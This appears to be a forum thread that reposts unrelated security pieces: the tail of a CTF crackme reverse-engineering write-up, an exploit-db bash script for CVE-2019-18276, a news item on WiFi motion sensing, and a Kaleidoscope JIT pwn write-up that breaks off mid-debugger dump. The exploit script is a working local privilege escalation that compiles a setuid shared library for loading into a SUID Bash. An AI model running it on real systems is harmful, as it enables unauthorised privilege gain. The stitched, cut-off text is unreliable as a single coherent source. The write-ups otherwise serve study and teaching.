"I am: " 0x555ef9f54904 mov eax, 0 0x555ef9f54909 call sym.imp.printf ; int printf(const char *format) 0x555ef9f5490e lea rax, [var_20h] 0x555ef9f54912 mov rsi, rax 0x555ef9f54915 lea rdi, [0x555ef9f550d6] ; "%s" 0x555ef9f5491c mov eax, 0 0x555ef9f54921 call sym.imp.__isoc99_scanf ; int scanf(const char *format) Note that this is a 64-bit binary, meaning that the first few arguments are passed via registers instead of the stack. The time that the program takes after the user input is not because it decrypts anything, but because the sleep function is called with 3 as an argument. The argument is the amount of seconds that the program should sleep. After that, there are a lot of variable declarations. In the disassembly below, these are omitted to improve the readability of the code. 0x555ef9f54926 mov edi, 3 0x555ef9f5492b call sym.imp.sleep ; int sleep(int s) ;omitted variable initialisations When the 3 second sleep is over, more variables are set. After that the current time since epoch is requested. The result of this is stored in eax. The value of eax is then moved into edi, where the current time is used as a seed for the random function. 0x555ef9f54ea1 mov qword [var_4d8h], rax 0x555ef9f54ea8 mov dword [var_800h], 4 0x555ef9f54eb2 mov dword [var_7fch], 0x12c ; 300 0x555ef9f54ebc mov edi, 0 0x555ef9f54ec1 call sym.imp.time ; time_t time(time_t *timer) 0x555ef9f54ec6 mov edi, eax 0x555ef9f54ec8 call sym.imp.srand ; void srand(int seed) A couple of other variables are then set, where one instruction is different from the majority that is encountered. At 0x555ef9f54eeb, only a single byte is moved. The value 0xa is also equal to a newline character. 0x555ef9f54ecd mov dword [var_804h], 0 0x555ef9f54ed7 mov dword [var_7f8h], 0x29 ; ')' ; 41 0x555ef9f54ee1 mov dword [var_7f4h], 3 0x555ef9f54eeb mov byte [var_9h], 0xa After that, a loop is encountered. At first, the variable var_804h is set to 0, making it likely that this variable is used as the counter, or i in the original source code. The unconditional jump downards moves i into eax. If eax is less than the value of var_7f4h, the upwards jump is taken again. Just above the loop, var_7f4h is set to equal 3. This means that this loop will iterate three times before the execution continues. The code is given below. 0x555ef9f54eef mov dword [var_804h], 0 ┌─< 0x555ef9f54ef9 jmp 0x555ef9f54f24 ┌──> 0x555ef9f54efb mov eax, dword [var_804h] ╎│ 0x555ef9f54f01 movsxd rdx, eax ╎│ 0x555ef9f54f04 mov rax, qword [var_788h] ╎│ 0x555ef9f54f0b add rax, rdx ╎│ 0x555ef9f54f0e movzx edx, byte [rax] ╎│ 0x555ef9f54f11 mov eax, dword [var_804h] ╎│ 0x555ef9f54f17 cdqe ╎│ 0x555ef9f54f19 mov byte [rbp + rax - 0x14], dl ╎│ 0x555ef9f54f1d add dword [var_804h], 1 ╎│ ; CODE XREF from main @ 0x555ef9f54ef9 ╎└─> 0x555ef9f54f24 mov eax, dword [var_804h] ╎ 0x555ef9f54f2a cmp eax, dword [var_7f4h] └──< 0x555ef9f54f30 jl 0x555ef9f54efb Within the loop, the value of i is moved into eax, after which it is stored in rdx using the movsxd (Move With Sign Extension) instruction. The value that resides at var_788h is then moved into rax, and the value of i is added. The single byte that resides at the value of rax is moved into edx. The cdqe (Convert Doubleword to Quardword) instruction then increases the size. The value of dl is then stored at rbp plus rax minus 0x14. In other words, the value of dl is stored at base pointer plus the offset of the variable minus 0x14. At last, i is incremented with one. Based on the new value of i, the jump might or might not be taken. To simplify the explanation above, the value that is taken depends on the offset that is equal to i. When using arrays, i is often used to determine the offset within a loop. Note that the offset is used both when getting a value and setting a value. As such, one can rewrite the assembly code above into the C code that is given below. array1[i] = array2[i]; The address that var_14h points to is stored into eax, after which it is incremented with three. The value that resides at var_4e0h is then stored at rdx. Both values are then passed to the strcpy function, which copies the value of the second argument at the location that is stored in the first argument. Note that the offset of 3 is used when defining the destination of the strcpy function. The previous loop iterated for three times. 0x555ef9f54f32 lea rax, [var_14h] 0x555ef9f54f36 add rax, 3 0x555ef9f54f3a mov rdx, qword [var_4e0h] 0x555ef9f54f41 mov rsi, rdx 0x555ef9f54f44 mov rdi, rax 0x555ef9f54f47 call sym.imp.strcpy ; char *strcpy(char *dest, const char *src) The loop below is similar the the one that is observed above. It copies a variable into rbp + rax – 0x14, where rax is the iteration’s offset. This time, however, the offset starts at 6 before adding the value of the current iteration, which is stored in var_804h. 0x555ef9f54f4c mov dword [var_804h], 0 ┌─< 0x555ef9f54f56 jmp 0x555ef9f54f85 ┌──> 0x555ef9f54f58 mov eax, dword [var_804h] ╎│ 0x555ef9f54f5e movsxd rdx, eax ╎│ 0x555ef9f54f61 mov rax, qword [var_670h] ╎│ 0x555ef9f54f68 add rax, rdx ╎│ 0x555ef9f54f6b mov edx, dword [var_804h] ╎│ 0x555ef9f54f71 lea ecx, [rdx + 6] ╎│ 0x555ef9f54f74 movzx edx, byte [rax] ╎│ 0x555ef9f54f77 movsxd rax, ecx ╎│ 0x555ef9f54f7a mov byte [rbp + rax - 0x14], dl ╎│ 0x555ef9f54f7e add dword [var_804h], 1 ╎│ ; CODE XREF from main @ 0x555ef9f54f56 ╎└─> 0x555ef9f54f85 cmp dword [var_804h], 2 └──< 0x555ef9f54f8c jle 0x555ef9f54f58 Alternatively, one could use i and the hardcoded offset in pseudo code as follows: array1[i + 6] = array2[i]; Similar to the loop above, this loop performs the same action, but using a default offset of 9 instead of 6. 0x555ef9f54f8e mov dword [var_804h], 0 ┌─< 0x555ef9f54f98 jmp 0x555ef9f54fc7 ┌──> 0x555ef9f54f9a mov eax, dword [var_804h] ╎│ 0x555ef9f54fa0 movsxd rdx, eax ╎│ 0x555ef9f54fa3 mov rax, qword [var_718h] ╎│ 0x555ef9f54faa add rax, rdx ╎│ 0x555ef9f54fad mov edx, dword [var_804h] ╎│ 0x555ef9f54fb3 lea ecx, [rdx + 9] ╎│ 0x555ef9f54fb6 movzx edx, byte [rax] ╎│ 0x555ef9f54fb9 movsxd rax, ecx ╎│ 0x555ef9f54fbc mov byte [rbp + rax - 0x14], dl ╎│ 0x555ef9f54fc0 add dword [var_804h], 1 ╎│ ; CODE XREF from main @ 0x555ef9f54f98 ╎└─> 0x555ef9f54fc7 cmp dword [var_804h], 2 └──< 0x555ef9f54fce jle 0x555ef9f54f9a The loops and string copy are used to create one string out of multiple others. The offset that increases with three every time, is used to determine where the new string should start. Two variables are then compared using the strcmp function. 0x555ef9f54fd0 lea rdx, [var_20h] 0x555ef9f54fd4 lea rax, [var_14h] 0x555ef9f54fd8 mov rsi, rdx 0x555ef9f54fdb mov rdi, rax 0x555ef9f54fde call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2) The return value of strcmp is then compared. If the two strings are equal, the success message is printed. If the two strings are not equal, the failure message is printed. The program then exits by returning zero, which is the exit code of a graceful exit. 0x555ef9f54fe3 test eax, eax ┌─< 0x555ef9f54fe5 jne 0x555ef9f54ff5 │ 0x555ef9f54fe7 lea rdi, str.It_seems_to_me__that_you_are_home ; 0x555ef9f55268 ; "It seems to me, that you are home!" │ 0x555ef9f54fee call sym.imp.puts ; int puts(const char *s) ┌──< 0x555ef9f54ff3 jmp 0x555ef9f55001 │└─> 0x555ef9f54ff5 lea rdi, str.Not_all_those_who_wander_are_lost__although_it_seems_you_are ; 0x555ef9f55290 ; "Not all those who wander are lost, although it seems you are!" │ 0x555ef9f54ffc call sym.imp.puts ; int puts(const char *s) │ ; CODE XREF from main @ 0x555ef9f54ff3 └──> 0x555ef9f55001 mov eax, 0 0x555ef9f55006 mov rcx, qword [var_8h] 0x555ef9f5500a xor rcx, qword fs:[0x28] ┌─< 0x555ef9f55013 je 0x555ef9f5501a │ 0x555ef9f55015 call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void) └─> 0x555ef9f5501a leave └ 0x555ef9f5501b ret To see when the two strings are equal, one can set a breakpoint on the strcmp function. By inspecting the arguments in the memory, one can see both the user input and the generated flag. The strcmp function resides at 0x555ef9f54fde. Within Radare2, one can set a breakpoint using db address (Debug Break) where address is the location of the breakpoint. As such, one has to issue the following command to set a breakpoint on the strcmp function: db 0x555ef9f54fde To continue execution until the breakpoint is hit, one uses the dc (Debug Continue) command. During the execution, one has to provide user input to the riddle in order to continue the execution. When the breakpoint is hit, the two arguments are located at rdx and rdi. Below, the argument set-up and function call to the strcmp function are given again. 0x555ef9f54fd0 lea rdx, [var_20h] 0x555ef9f54fd4 lea rax, [var_14h] 0x555ef9f54fd8 mov rsi, rdx 0x555ef9f54fdb mov rdi, rax 0x555ef9f54fde call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2) The variable names are based upon the offset compared to rbp. The location where all the loops wrote data to is located at rbp + rax – 0x14. In this case, rax was used to determine the offset into rbp – 0x14, which is also known as var_14h. As such, the variable var_14h contains the flag that was generated. The address of var_14h is stored in rax, after which it is moved into rdi. When the breakpoint is hit, one can use ps @ address to print the string at a given address or register. The result of ps @ rdi will provide the flag: D0wN_uN|)3r Dynamic analysis – tracing When tracing the binary, one will get to know information about the calls it makes without interfering with the binary itself. Given that the standard C library is used (based on the strings within the binary), one can assume that functions from this library are used to perform actions. As such, the GNU Linux ltrace (Library Trace) utility can be used. Below, an excerpt from the ltrace manual pages is given. ltrace is a program that simply runs the specified command until it exits. It intercepts and records the dynamic library calls which are called by the executed process and the signals which are received by that process. It can also intercept and print the system calls executed by the program. Starting the binary is simple: provide the path to ltrace as an argument and press enter. The output is given below. ltrace ./whereAmI.elf puts("If up is down, then where are yo"...If up is down, then where are you now? ) = 39 printf("I am: ") = 6 __isoc99_scanf(0x55799c2230d6, 0x7ffc8b93d7e0, 0, 0I am: The program then awaits the user input, as it normally would. The execution of the program is resumed normally after providing the user input, as can be seen below. __isoc99_scanf(0x55799c2230d6, 0x7ffc8b93d7e0, 0, 0I am: user_input ) = 1 sleep(3) = 0 time(0) = 1574117574 srand(0x5dd320c6, 0x7ffc8b93cfa0, 0, 0x7ff3ed5b29a4) = 0 strcpy(0x7ffc8b93d7ef, "N_u") = 0x7ffc8b93d7ef strcmp("D0wN_uN|)3r", "user_input") = -49 puts("Not all those who wander are los"...Not all those who wander are lost, although it seems you are! ) = 62 +++ exited (status 0) +++ As can be seen in the output, the program sleeps for 3 seconds, after which the current time is obtained. The random function is seeded, the string N_u is copied towards a specific address. The user input is then compared to D0wN_uN|)3r and the failure message is then written towards the output stream. This way, the flag is obtained without diassembling the binary. Static code analysis All default options were used when analysing the binary with Ghidra 9.0.2, as well as the Decompile Parameter ID option. Since Ghidra cannot find a main function, one will have to start at the entry function, which is given below. void entry(undefined8 param_1,undefined8 param_2,undefined8 param_3) { undefined8 in_stack_00000000; undefined auStack8 [8]; __libc_start_main(FUN_001008ca,in_stack_00000000,&stack0x00000008,FUN_00101020,FUN_00101090, param_3,auStack8); do { /* WARNING: Do nothing block with infinite loop */ } while( true ); } The __libc_start_main function requires multiple arguments. By default, the first argument is a pointer towards the main function. Double clicking on it will show the main function. The complete function is given below, after which it is analysed in parts. undefined8 FUN_001008ca(void) { int iVar1; time_t tVar2; long in_FS_OFFSET; int local_80c; char local_28 [12]; char local_1c [11]; undefined local_11; long local_10; local_10 = *(long *)(in_FS_OFFSET + 0x28); puts("If up is down, then where are you now?"); printf("I am: "); __isoc99_scanf(&DAT_001010d6,local_28); sleep(3); tVar2 = time((time_t *)0x0); srand((uint)tVar2); local_11 = 10; local_80c = 0; while (local_80c < 3) { local_1c[(long)local_80c] = (&DAT_0010110d)[(long)local_80c]; local_80c = local_80c + 1; } strcpy(local_1c + 3,"N_u"); local_80c = 0; while (local_80c < 3) { local_1c[(long)(local_80c + 6)] = (&DAT_00101198)[(long)local_80c]; local_80c = local_80c + 1; } local_80c = 0; while (local_80c < 3) { local_1c[(long)(local_80c + 9)] = (&DAT_00101145)[(long)local_80c]; local_80c = local_80c + 1; } iVar1 = strcmp(local_1c,local_28); if (iVar1 == 0) { puts("It seems to me, that you are home!"); } else { puts("Not all those who wander are lost, although it seems you are!"); } if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return 0; } The purpose of the function becomes clear near the end, where two strings are compared. Based on the comparison result (which is stored in iVar1), one of two possible strings is printed. If the two values are equal, the success message is printed. If they are not equal, the failure message is printed. One can rename iVar1 into comparisionResult. Within the loops above, the variable local_80c is used to keep track of the amount o fiterations. As such, this variable can be renamed into i. In the beginning, the program prints the riddle and requests the user input. The user input is stored in local_28, which can be renamed into userInput. Based on the two arguments of the string compare function, this means that local_1c is the generated flag. One can rename local_1c into generatedFlag After storing the user input, the program sleeps for 3 seconds. The current time since epoch is then stored in tVar2, after which it is used to seed the random function. One can rename tVar2 into currentTime, as can be seen below. puts("If up is down, then where are you now?"); printf("I am: "); __isoc99_scanf(&DAT_001010d6,userInput); sleep(3); currentTime = time((time_t *)0x0); srand((uint)currentTime); All the global variables are marked with DAT_*. All global variables within the loops are character arrays. By changing their type into char[3] using the T hotkey in the diassembly window, their literal value will be shown within the decompiler. The code below reflects all changes that have been made. undefined8 FUN_001008ca(void) { long lVar1; int comparisionResult; time_t currentTime; long in_FS_OFFSET; int i; char userInput [12]; char generatedFlag [11]; lVar1 = *(long *)(in_FS_OFFSET + 0x28); puts("If up is down, then where are you now?"); printf("I am: "); __isoc99_scanf(&DAT_001010d6,userInput); sleep(3); currentTime = time((time_t *)0x0); srand((uint)currentTime); i = 0; while (i < 3) { generatedFlag[(long)i] = "D0w"[(long)i]; i = i + 1; } strcpy(generatedFlag + 3,"N_u"); i = 0; while (i < 3) { generatedFlag[(long)(i + 6)] = "N|)"[(long)i]; i = i + 1; } i = 0; while (i < 3) { generatedFlag[(long)(i + 9)] = "3r"[(long)i]; i = i + 1; } comparisionResult = strcmp(generatedFlag,userInput); if (comparisionResult == 0) { puts("It seems to me, that you are home!"); } else { puts("Not all those who wander are lost, although it seems you are!"); } if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return 0; } Based on this, one can see how the flag is constructed. There are four variables that are concatenated into a single string to form the flag. The first three characters are copied into index zero through two within a loop. The next three characters are copied into index three through five using the strcpy function. The next two loops copy the last characters at different offsets. Each loop has an offset to ensure that the character that is copied, is placed at the correct location of the final string. One can simply copy and paste each part to form the flag: D0wN_uN|)3r. Challenge creation When creating a challenge, multiple methods to get the flag need to be possible whilst keeping a specific difficulty level in mind. In this case, the flag is not encrypted but spread out in multiple parts in no apparent order. Between the flag parts, there are a lot of unused variables of equal size to confuse the analyst. During runtime, the multiple flag parts are assembled in order, after which the user input is compared to the assembled flag. The length of each part, either part of the flag or a part of the garbage code to confuse the analyst, is 3 characters at most. This is done because the GNU Linux strings utility searches for strings that are at least four characters in size by default, as can be seen in the excerpt from the strings utility manual page. For each file given, GNU strings prints the printable character sequences that are at least 4 characters long (or the number given with the options below) and are followed by an unprintable character. By doing so, one cannot obtain the password by simply getting the strings from the binary. If one were to change the amount of characters to a smaller number, all the garbage strings will also show up. This provides some sort of a clue to the analyst, but it does not provide an answer. Due to the amount of garbage strings and the three second sleep after ingesting the user input, the application becomes infeasble to brute force. Using the current time to seed the random function is used to throw off analysts who are less certain of the analysis process. The variables are not used at all. The riddle is paired with the theme of Hackfest2019: upside down. The riddle asks where one is, if up is down. The event itself is hosted in Canada. Flipping the world map upside down, one can see that Canada would be at the place where Australia normally is. Note that one has to imagine the world map as a rectangle whilst turning it 180 degrees to the right. As such, one would be down under, or D0wN_uN|)3r in leetspeak. The full source of the challenge is given below. /* * File: whereAmI.c * Author: Max 'Libra' Kersten [@LibraAnalysis] * * Created on October 2, 2019, 9:06 PM */ #include <stdio.h> #include <stdlib.h> #include <time.h> #include <unistd.h> #include <string.h> /* * Flag: D0wN_uN|)3r */ int main(int argc, char *argv[]) { printf("If up is down, then where are you now?\n"); printf("I am: "); char userInput[12]; scanf("%s", userInput); sleep(3); char* trash0 = "DnF"; char* trash1 = "nIP"; char* trash2 = "zEZ"; char* trash3 = "uRC"; char* trash4 = "LgP"; char* trash5 = "cdM"; char* trash6 = "qeB"; char* trash7 = "xbI"; char* trash8 = "KPK"; char* trash9 = "jpb"; char* trash10 = "pWL"; char* trash11 = "NXs"; char* trash12 = "Ckx"; char* part1 = "D0w"; char* trash14 = "GXO"; char* trash15 = "RjK"; char* trash16 = "YbL"; char* trash17 = "VWC"; char* trash18 = "IWF"; char* trash19 = "gZF"; char* trash20 = "Lon"; char* trash21 = "ayh"; char* trash22 = "dGC"; char* trash23 = "MZI"; char* trash24 = "oPO"; char* trash25 = "wwK"; char* trash26 = "ySv"; char* part4 = "3r"; char* trash28 = "rOK"; char* trash29 = "HRE"; char* trash30 = "Qdw"; char* trash31 = "UIY"; char* trash32 = "XpQ"; char* trash33 = "MOP"; char* trash34 = "ayt"; char* trash35 = "zWI"; char* trash36 = "opG"; char* trash37 = "AnG"; char* trash38 = "hjs"; char* trash39 = "DeC"; char* trash40 = "lFO"; char* trash41 = "lLk"; char* trash42 = "kPe"; char* trash43 = "nJb"; char* trash44 = "hXE"; char* trash45 = "gIj"; char* trash46 = "NTx"; char* trash47 = "sHw"; char* part3 = "N|)"; char* trash49 = "UsC"; char* trash50 = "mkg"; char* trash51 = "hMI"; char* trash52 = "mBL"; char* trash53 = "lqU"; char* trash54 = "Cou"; char* trash55 = "AoM"; char* trash56 = "tBO"; char* trash57 = "ZAq"; char* trash58 = "rbo"; char* trash59 = "YOx"; char* trash60 = "JiX"; char* trash61 = "rhy"; char* trash62 = "lxq"; char* trash63 = "OOF"; char* trash64 = "AiJ"; char* trash65 = "fjz"; char* trash66 = "CKA"; char* trash67 = "Nbm"; char* trash68 = "qQV"; char* trash69 = "DSe"; char* trash70 = "ebQ"; char* trash71 = "Rwl"; char* trash72 = "Fia"; char* trash73 = "uyx"; char* trash74 = "sZz"; char* trash75 = "kfn"; char* trash76 = "jGG"; char* trash77 = "mwA"; char* trash78 = "TKW"; char* trash79 = "GWI"; char* trash80 = "KOl"; char* trash81 = "HMo"; char* trash82 = "aea"; char* trash83 = "ZPM"; char* trash84 = "JQd"; char* trash85 = "rqL"; char* trash86 = "dlY"; char* trash87 = "yBR"; char* trash88 = "eaz"; char* trash89 = "TTX"; char* trash90 = "ZGE"; char* trash91 = "SRc"; char* trash92 = "xxG"; char* trash93 = "jZY"; char* trash94 = "DCS"; char* trash95 = "chc"; char* trash96 = "SDe"; char* trash97 = "sRL"; char* part2 = "N_u"; char* trash99 = "jVl"; int argc2 = 4; int array[300]; int size = 300; srand(time(NULL)); int i = 0; int j = 41; int length = 3; char result[12]; result[11] = '\n'; i = 0; for (i; i < length; i++) { result[i] = part1[i]; } strcpy((result + 3), part2); for (i = 0; i < 3; ++i) { result[i + 6] = part3[i]; } for (i = 0; i < 3; ++i) { result[i + 9] = part4[i]; } if (strcmp(result, userInput) == 0) { printf("It seems to me, that you are home!\n"); } else { printf("Not all those who wander are lost, although it seems you are!\n"); } return (EXIT_SUCCESS); } Conclusion Both CTF challenges and malware can be analysed in a variety of ways. The approach one uses is partially based upon knowledge, partially based upon time, and partially based upon preference. Objectively, one method is not better than the other, although it might be quicker overall. To contact me, you can e-mail me at [info][at][maxkersten][dot][nl], send me a PM on Reddit or DM me on Twitter @LibraAnalysis. Sursa: https://maxkersten.nl/binary-analysis-course/assembly-basics/practical-case-crack-me-0x03/
  5. # Exploit Title : Bash 5.0 Patch 11 - SUID Priv Drop Exploit # Date : 2019-11-29 # Original Author: Ian Pudney , Chet Ramey # Exploit Author : Mohin Paramasivam (Shad0wQu35t) # Version : < Bash 5.0 Patch 11 # Tested on Linux # Credit : Ian Pudney from Google Security and Privacy Team based on Google CTF suidbash # CVE : 2019-18276 # CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2019-18276 , https://www.youtube.com/watch?v=-wGtxJ8opa8 # Exploit Demo POC : https://youtu.be/Dbwvzbb38W0 Description : An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11. By default, if Bash is run with its effective UID not equal to its real UID, it will drop privileges by setting its effective UID to its real UID. However, it does so incorrectly. On Linux and other systems that support "saved UID" functionality, the saved UID is not dropped. An attacker with command execution in the shell can use "enable -f" for runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore regains privileges. However, binaries running with an effective UID of 0 are unaffected. #!/bin/bash #Terminal Color Codes RED='\033[0;31m' GREEN='\033[0;32m' NC='\033[0m' #Get the Effective User ID (owner of the SUID /bin/bash binary) read -p "Please enter effective user id (euid) : " euid #Create a C file and output the exploit code touch pwn.c echo "" > pwn.c cat <<EOT >> pwn.c #include <sys/types.h> #include <unistd.h> #include <stdio.h> void __attribute((constructor)) initLibrary(void) { printf("Escape lib is initialized"); printf("[LO] uid:%d | euid:%d%c", getuid(), geteuid()); setuid($euid); printf("[LO] uid%d | euid:%d%c", getuid(), geteuid()); } EOT echo -e "${RED}" echo -e "Exploit Code copied to pwn.c !\n" sleep 5 echo -e "Compiling Exploit Object ! \n" $(which gcc ) -c -fPIC pwn.c -o pwn.o sleep 5 echo -e "Compiling Exploit Shared Object ! \n" $(which gcc ) -shared -fPIC pwn.o -o libpwn.so sleep 5 echo -e "Exploit Compiled ! \n" sleep 5 echo -e "Executing Exploit :) \n" sleep 5 #Execute the Shared Library echo -e "${RED}Run : ${NC} enable -f ./libpwn.so asd \n" Sursa: https://www.exploit-db.com/exploits/47726?utm_source=dlvr.it&utm_medium=twitter
  6. Your WiFi Signals Are Revealing Your Location by Sharon Lin November 28, 2019 The home may be the hearth, but it’s not going to be a place of safety for too long. With the abundance of connected devices making their ways into our homes, increasing levels of data may allow for more accurate methods for remote surveillance. By measuring the strength of ambient signals emitted from devices, a site can be remotely monitored for movement. That is to say, WiFi signals may soon pose a physical security vulnerability. In a study from the University of Chicago and the University of California, Santa Barbara, researchers built on earlier studies where they could use similar techniques to “see through walls” to demonstrate a proof-of-concept for passive listening. Attackers don’t need to transmit signals or break encryptions to gain access to a victim’s location – they just need to listen to the ambient signals coming from connectedd devices, making it more difficult to track bad actors down. Typically, connected devices communicate to an access point such as a router rather than directly with the Internet. A person walking near a device can subtly change the signal propagated to the access point, which is picked up by a receiver sniffing the signal. Most building materials do not block WiFi signals from propagating, allowing receivers to be placed inconspicuously in different rooms from the access point. WiFi sniffers are relatively inexpensive, with models running for less than $20. They’re also small enough to hide in unsuspecting locations – inside backpacks, inside a box – and emit no signal that could be detected by a target. The researchers proposed some methods for safeguarding against the vulnerability: insulating buildings against WiFi leakage (while ensuring that desirable signals, i.e. signals from cell tower are still able to enter) or having access points emit a “cover signal” that mixes signals from connected devices to make it harder to sniff for motion. While we may not be seeing buildings surrounded by Faraday cages anytime soon, there’s only going to be more attack surfaces to worry about as our devices continue to become connected. [Thanks to Qes for the tip!] Sursa: https://hackaday.com/2019/11/28/your-wifi-signals-are-revealing-your-location/
  7. [Redhat2019] Kaleidoscope 發表於 2019-11-11 | 分類於 Hack 这是连续第三届参加广东省的红帽杯比赛了,就题目质量来说明显是一届比一届高,看到这题万花筒惊喜之余也感叹国内的CTF比赛门槛真是越来越高了。作为一道基于解释器改编的题目,通过传统的逆向方法来做还是比较困难,因此分享一下用fuzzing来找到题目漏洞以及后续的分析利用。 This challenge is from a CTF game of Guangdong province, China. It is a Pwn challenge based on llvm JIT engine. You can download this challenge at this link. Recon At first you may not able to run this binary directly, because of the missing libary libLLVM-6.0.so.1, use sudo apt-get install libllvm6.0 to solve the dependency. It will give us a interpreter interface like: ready> a = 1 ready> 1+1 Error: Unknown variable name ready> a+1 Evaluated to 2 ready> Drop the binary into ida and we can see that it was written by C++, and the designer turned on some optimization settings when compiling, so the decompile result was really hard to follow. The symbols tell us, this is a Kaleidoscope JIT interpreter, which is used by llvm project as tutorial to demonstrate how to implement a JIT interpreter. We can find the tutorial here: Building a JIT: Starting out with KaleidoscopeJIT, and the source code at llvm-kaleidoscope. The main function is clear in source code: int main() { BinopPrecedence['<'] = 10; BinopPrecedence['+'] = 20; BinopPrecedence['-'] = 20; BinopPrecedence['*'] = 40; fprintf(stderr, "ready> "); getNextToken(); TheModule = llvm::make_unique<Module>("My awesome JIT", TheContext); MainLoop(); TheModule->print(errs(), nullptr); return 0; } but in ida it looks really terrible: LLVMInitializeX86TargetInfo(*(_QWORD *)&argc, argv, envp); LLVMInitializeX86Target(); LLVMInitializeX86TargetMC(); LLVMInitializeX86AsmPrinter(); LLVMInitializeX86AsmParser(); __k[0] = '='; *std::map<char,int,std::less<char>,std::allocator<std::pair<char const,int>>>::operator[](&BinopPrecedence, __k) = 2; __k[0] = '<'; *std::map<char,int,std::less<char>,std::allocator<std::pair<char const,int>>>::operator[](&BinopPrecedence, __k) = 10; __k[0] = '+'; *std::map<char,int,std::less<char>,std::allocator<std::pair<char const,int>>>::operator[](&BinopPrecedence, __k) = 20; __k[0] = '-'; *std::map<char,int,std::less<char>,std::allocator<std::pair<char const,int>>>::operator[](&BinopPrecedence, __k) = 20; __k[0] = '*'; *std::map<char,int,std::less<char>,std::allocator<std::pair<char const,int>>>::operator[](&BinopPrecedence, __k) = 40; v3 = &stderr; fwrite("ready> ", 7uLL, 1uLL, stderr); ... Comparing these two pieces of code, we can see the challenge define = as BinopPrecedence while the original version didn’t. I try to follow the code but soon decide to change another method. Fuzzing So I turned to fuzzing and hope to find some bugs. I tried AFL with qemu mode to run this binary first, but it stuck on the initialization. If you know how to run such a binary with AFL, please do let me know. matthew@matthew-MS-7A37 /m/d/L/Fuzz> afl-fuzz -i in/ -o out1/ -Q -- ./wang afl-fuzz 2.52b by <lcamtuf@google.com> [+] You have 8 CPU cores and 6 runnable tasks (utilization: 75%). [+] Try parallel jobs - see /usr/local/share/doc/afl/parallel_fuzzing.txt. [*] Checking CPU core loadout... [+] Found a free CPU core, binding to #0. [*] Checking core_pattern... [*] Setting up output directories... [+] Output directory exists but deemed OK to reuse. [*] Deleting old session data... [+] Output dir cleanup successful. [*] Scanning 'in/'... [+] No auto-generated dictionary tokens to reuse. [*] Creating hard links for all input files... [*] Validating target binary... [*] Attempting dry run with 'id:000000,orig:1.txt'... [*] Spinning up the fork server... [+] All right - fork server is up. ...(It just stop here) Then I try honggfuzz, which is another popular fuzzer support binary instrument. At first I cloned the source code from github but failed on compilation. Then I found a docker image at Doker hub, but it does not support qemu mode. I had to attach to the container and complied the qemu mode, some dependencies installation are unavoidable. It took me more than 2 hours to setup this tool (the network connection is always big problem when you setting up similar tools in China). The command of running this docker image is: docker run --rm -it -v (pwd):/work --privileged zjuchenyuan/honggfuzz:latest /bin/bash and you can find the usage of honggfuzz here: USAGE, for the qemu mode we need, it can be run by: honggfuzz -f /work/in/ -s -- ./qemu_mode/honggfuzz-qemu/x86_64-linux-user/qemu-x86_64 /work/kaleidoscope The seed corpus was put in /work/in, I simply chose the code snippet from https://llvm.org/docs/tutorial/OCamlLangImpl1.html#the-basic-language: # Compute the x'th fibonacci number. def fib(x) if x < 3 then 1 else fib(x-1)+fib(x-2) # This expression will compute the 40th number. fib(40) I run this in a vmware workstation vm, so the speed is a kind of slow, but it still give us some crashes in less than ten minutes. I believe this will be much faster on a bare metal linux machine. Iterations : 5810 [5.81k] Mode [3/3] : Feedback Driven Mode Target : ./qemu_mode/honggfuzz-qemu/x86_6.....u-x86_64 /work/kaleidoscope Threads : 4, CPUs: 8, CPU%: 424% [53%/CPU] Speed : 0/sec [avg: 1] Crashes : 200 [unique: 0, blacklist: 0, verified: 0] Timeouts : 0 [10 sec] Corpus Size : 97, max: 8192 bytes, init: 2 files Cov Update : 0 days 00 hrs 01 mins 18 secs ago Coverage : edge: 3922/45011 [8%] pc: 1541 cmp: 135658 Crashes The fuzzer gave us a crash in less than ten minutes, I review the crashes, it seems like some heap corruption issue, but the stacktrace was hard to look at. ─────────────────────────────────[ REGISTERS ]────────────────────────────────── RAX 0x0 RBX 0x7ffff399b840 (stderr) —▸ 0x7ffff399b680 (_IO_2_1_stderr_) ◂— 0xfbad2887 RCX 0x7ffff35ede97 (raise+199) ◂— mov rcx, qword ptr [rsp + 0x108] RDX 0x0 RDI 0x2 RSI 0x7fffffffd660 ◂— 0x0 R8 0x0 R9 0x7fffffffd660 ◂— 0x0 R10 0x8 R11 0x246 R12 0x5555556030b0 —▸ 0x5555555d4fd0 —▸ 0x5555555d5040 ◂— 0x0 R13 0x7ffff3ff9550 (std::bad_alloc::~bad_alloc()) ◂— mov rax, qword ptr [rip + 0x3390f1] R14 0x55555569ec40 —▸ 0x5555555ef820 —▸ 0x5555555c70e0 —▸ 0x5555555f7700 —▸ 0x5555555f76c0 ◂— ... R15 0x55555569ec30 —▸ 0x55555569ec40 —▸ 0x5555555ef820 —▸ 0x5555555c70e0 —▸ 0x5555555f7700 ◂— ... RBP 0x7ffff40dbfe2 ◂— jae 0x7ffff40dc058 /* u'std::bad_alloc' */ RSP 0x7fffffffd660 ◂— 0x0 RIP 0x7ffff35ede97 (raise+199) ◂— mov rcx, qword ptr [rsp + 0x108] ───────────────────────────────────[ DISASM ]─────────────────────────────────── ► 0x7ffff35ede97 <raise+199> mov rcx, qword ptr [rsp + 0x108] <0x7ffff35ede97> 0x7ffff35ede9f <raise+207> xor rcx, qword ptr fs:[0x28] 0x7ffff35edea8 <raise+216> mov eax, r8d 0x7ffff35edeab <raise+219> jne raise+252 <0x7ffff35edecc> ↓ 0x7ffff35edecc <raise+252> call __stack_chk_fail <0x7ffff36e3c80> 0x7ffff35eded1 nop word ptr cs:[rax + rax] 0x7ffff35ededb nop dword ptr [rax + rax] 0x7ffff35edee0 <killpg> test edi, edi 0x7ffff35edee2 <killpg+2> js killpg+16 <0x7ffff35edef0> 0x7ffff35edee4 <killpg+4> neg edi 0x7ffff35edee6 <killpg+6> jmp 0x7ffff35ee180 <0x7ffff35ee180> ───────────────────────────────────[ STACK ]──────────────────────────────────── 00:0000│ rsi r9 rsp 0x7fffffffd660 ◂— 0x0 01:0008│ 0x7fffffffd668 —▸ 0x7ffff399b420 (main_arena+2016) —▸ 